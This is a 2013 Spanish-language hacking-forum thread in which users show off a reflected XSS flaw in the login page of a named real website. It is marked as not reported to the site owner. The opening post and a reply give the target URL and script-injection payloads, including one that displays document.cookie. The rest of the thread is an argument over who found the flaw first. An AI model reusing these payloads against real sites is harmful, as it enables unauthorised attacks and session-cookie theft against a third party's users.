Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Muppet en Marzo 12, 2013, 12:08:48 AM

Título: XSS login.asp
Publicado por: Muppet en Marzo 12, 2013, 12:08:48 AM
(http://i50.tinypic.com/352g877.png)
(http://i48.tinypic.com/25smr5y.png)

Xss Reflected:
Web: http://www.cotec.com.ar/login2.asp
Vector: <script>alert("HD_Breaker")</script>
Reportado: No

PD: un fallo algo raro, que esta dado ya que se muestra escrito en web la sentencia el Usuario "XSS" No existe, de esta forma se puede explotar este tipo de XSS
Título: Re:XSS login.asp
Publicado por: Hu0r en Marzo 12, 2013, 01:52:26 AM
Buena, he encontrado varias así mismo.
Título: Re:XSS login.asp
Publicado por: Cronos en Marzo 12, 2013, 12:45:32 PM
Yo siempre eh tratado pero no eh encontrado web con esa vulnerabilidad en el login..
Muy bueno, gracias por compartir!
Saludos,, Cronos.-
Título: Re:XSS login.asp
Publicado por: OverHoax en Marzo 12, 2013, 11:03:36 PM
Xss Reflected

Web = http://www.cotec.com.ar/login2.asp
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax

IFXss

Web = http://www.cotec.com.ar/login2.asp
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax

Salu2

OverHoax
Título: Re:XSS login.asp
Publicado por: Muppet en Marzo 12, 2013, 11:46:40 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Xss Reflected

Web = http://www.cotec.com.ar/login2.asp
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax

IFXss

Web = http://www.cotec.com.ar/login2.asp
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax

Salu2

OverHoax

??? Creo que llegaste tarde bro, el autor de este xss soy yo, por eso lo publique no?
Título: Re:XSS login.asp
Publicado por: OverHoax en Marzo 13, 2013, 04:22:04 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Xss Reflected

Web = http://www.cotec.com.ar/login2.asp
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax

IFXss

Web = http://www.cotec.com.ar/login2.asp
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax

Salu2

OverHoax

??? Creo que llegaste tarde bro, el autor de este xss soy yo, por eso lo publique no?

Se que eres tu, pero pudiste publicarlas todas no solo 1... pero no vi que pusieras el de la IFXss
Título: Re:XSS login.asp
Publicado por: Muppet en Marzo 14, 2013, 01:35:17 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Xss Reflected

Web = http://www.cotec.com.ar/login2.asp
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax

IFXss

Web = http://www.cotec.com.ar/login2.asp
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax

Salu2

OverHoax

??? Creo que llegaste tarde bro, el autor de este xss soy yo, por eso lo publique no?

Se que eres tu, pero pudiste publicarlas todas no solo 1... pero no vi que pusieras el de la IFXss

No se reportan todos los vectores, se reporta el fallo, XSS, IFxss es una variacion que depende del script inyectado pero sigue haciendo uso de un XSS
Título: Re:XSS login.asp
Publicado por: Matabarras en Marzo 15, 2013, 08:22:30 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
wow me sorprende tu conocimiento

respeto.

Jajajaajaajajajajaa que Kapo.
Sólo texto | Texto con Imágenes